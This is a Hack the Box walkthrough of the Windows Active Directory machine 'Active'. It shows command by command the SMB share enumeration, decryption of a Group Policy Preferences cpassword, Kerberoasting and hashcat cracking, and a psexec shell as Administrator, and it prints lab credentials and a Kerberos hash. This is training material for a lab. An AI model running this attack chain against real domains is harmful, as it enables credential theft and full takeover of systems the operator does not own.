Active Walkthrough

Hack the Box Windows Active Directory machine. Rated as easy by the HTB community.

Initial Recon

Let’s get a big picture overview of our environment by running rustscan to get the information we need to start our pentest.

rustscan -a 10.129.145.211 --ulimit 5000 -- -sC -sV

We see port 88 – Kerberos and port 389 – ldap, so we can confirm this an Active Directory (AD) machine.

Lightweight Directory Access Protocol (LDAP) reveals the the domain name active.htb. We should add this to our /etc/hosts file like we would when we find the domain name of a webapp on linux machines.

LDAP is an application protocol for accessing and maintaining distributed directory information services over an IP network. Active Directory is the actual directory service (the database and the management service) that speaks the LDAP language.

SMB Share Enumeration

Whenever SMB is available, I like to start my enumeration there first. If shares are accessible to read permissions, we can get a lot of information on the system, the users, applications, and possibly even cleartext credentials. To identify which shares are available and which ones we can Read as an anonymous user, let’s use the tool smbmap.

smbmap -H active.htb

This provides the best actionable results and the best visual representation of the shares available. Smbclient would list them out and we would have to test getting access to each share vs smbmap which quickly identifies only one share we can access as our user.

Now we can use smbclient to connect to the Replication share.

smbclient \\\\10.129.145.211\\Replication

I found that this share had many directories/files I had to keep navigating and writing down which ones I already visited. I searched for a way to recursively search the share with smbclient but did not find what I was looking for. smbmap provides a better way to do this which is quicker and provides the visual “tree map” that I was looking for. 

smbmap -r Replication/ -H 10.129.145.211 --depth 100 # probavly didn't need 100 but it did the job

After doing some research I found out that the file groups.xml particularly in older version of windows like server 2008 which is the target machine, poses a huge security risk. When an administrator used GPP in Windows Server 2008 (and R2) to create or update Local User and Group settings on domain-joined machines—for example, to set a standard local administrator password—the password was stored in the Groups.xml file with an attribute called cpassword.

We can download this file to our kali machine.

smbmap -h # identify what requirement is need to download a file
smbmap -r Replication/ -H 10.129.145.211 --depth 100 -A Groups.xml

The output tells us where it downloaded the file to > /root/HTB/Active/10.129.145.211-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

I’m going to move it to our pwd, and then read the contents with xmlint. xmllint is a command-line tool used for parsing, validating, converting, and formatting XML documents. This should make it slightly more readable. 

mv /root/HTB/Active/10.129.145.211-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml .

cat 10.129.145.211-Replication_active.htb_Policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml | xmllint --format -

We get a user “SVC_TGS” and cpassword:”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”

Now we need to crack this password and we can use gpp-decrypt which uses AES-256 key to decrypt the data. gpp-decrypt is a utility specifically designed to decrypt the cPassword (or “cipher-password”) attribute found in Group Policy Preferences (GPP) XML files on a Windows domain. 

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

We got a password.

Looking back at our initial scan, we have a http port open that leads to nothing and then we have smb again which had multiple “non-default” shares but we were only able to read one replication. The default shares are the ones with the $ symbol. We can use these creds to run smbmap again an authenticated user and see if we have read access to more shares. 

smbmap -H active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

We have access to every non default share.

Searching recursively with smbmap we find the user.txt file.

smbmap -H active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -r Users --depth 100

Need to download it to submit the local flag.

smbmap -H active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -A user.txt -r Users --depth 100

There are no interesting files.

Service Accounts

Whenever getting access to domain credentials it is important to test the tools from impacket. In this case we will use GetUserSPNs.py to extract encrypted passwords of any kerberoastable service accounts.

GetUserSPNs.py -request -dc-ip 10.129.145.211 active.htb/SVC_TGS

Now we can use hashcat to crack the hash. We must add it to a file, identify the module number, and then run hashcat

echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$bb15c85193ab32f2a5feee74c61c5297$673e5e8a1fab7b283b3aa6940bc2dd52f4db1284e47304ea69241c1066e31c3f4cdfa51eb1defb581504445e4ff7914d7c6683c2c31f85a22ac35c9d6f892e5f955e569c8fb58229e40d393ba21109c63ae90b41a0a65efa51bca508fc90aa728ce57fc62b5f89965379d340fbf33ba2360222021ef018ba12417eaa41476a4b1b3835d8de71fb0053b28b5d15cdebf2d50d4e730210de26717b1b1b192a521d856373819a66ae00ad9df5cbfbe1d9c26c341a8e2c89b94f59387bb3581e70ec75388a0bfe919856a827608a59ed513715c3c7892ed26ad7fa236327996347d473a0f44b7b30ba6948a39ab56846790bc5e375397fecd795e353daf79813b2432e7bbb32e99da8865b69e9f6a895c5c3b211aa1e858d111ba7166d8880a6d2eba24d61602d0241e5d1db660f5665e84139e5eb7e50621a9fa5dc765be3541996b699a76cfd906a1569b41dded8c95a61356095886e963ea5b91080052e8a28263534d5a84ae6581fb3b6be124fc676b5efc11c0041186a888b5679a5e72e584a6b65ce17d828b9d18dba7d4fc69c2e550594254fb0fca87d1d076d6bd22a285692e3c242ffc79a3204078eb0ff35de3dc9ace1bd86c69694249281aba619141dee978a2ea76d5f4cfdee334521c464f057b245dc32d8c76a8b921ba7ba4ca0cd0f06d780a4fc2f9764df33db36d4ddc5b8fab46595db4afd906d4a84bc861fbd2f0acc7ff4a87fa230ef59b806406656963f10d36fc50729a8b6bd6986d76b7f7db3da7e99c2b3fc7191f723fb9d1e5e5ae1faa952cdc2d08f1b158ac50965c29b4662b32eec33d11ed579dbffbd530ba1550c24b45edc66bd98af29f4149b19e5b0111533b0894628b5a8cb7352ae7fdd4c919bab57a364777594391aefd0756ddbb9e4df844ec1a5413d2c71e9635afd1c858f4dd9dec72f1df67dc4a7fd85e442bd76563dd5c8aca82ce23b90bfe2af0a8ba7c99f43a545bdb1eb94edbaf1ae514bb2483e35873df13527406cdb06b8616eb171a61b8e0bbdf55c7b17944d0c0d71436da6fa92a7870d81f724ddc2a8905d4f8b6cfd055caff40e4df5163e97feb2541486f6277ec4c13c099c4d3a1309c9dd7736af156cc6f810c6afc1273b74e5414ab4c836122be79e562aed39a0a4969f166717a49bbfa3a25441b3450d67b6f82fda92335e27be235219a185035ef1cca5f26f1da97d6e143947f2a0685beaf953ecf981e5cae8f2620de16221065eb002b11bfb94f8' > hash.txt

hash module 13100. Run hashcat

hashcat -m 13100 hash.txt -w /usr/share/wordlist/rockyou.txt

We get a password for the Administrator user. We could use this

Root

Now that we have a these credentials we can run psexec.py. This impacket tool requires 3 things. The user needs to be a local admin on the target machine, it must be have SMB open, and they must have administrative privileges to the default IPC$ share. 

psexec.py active.htb/Administrator:'Ticketmaster1968'@10.129.145.211

Pwn3d!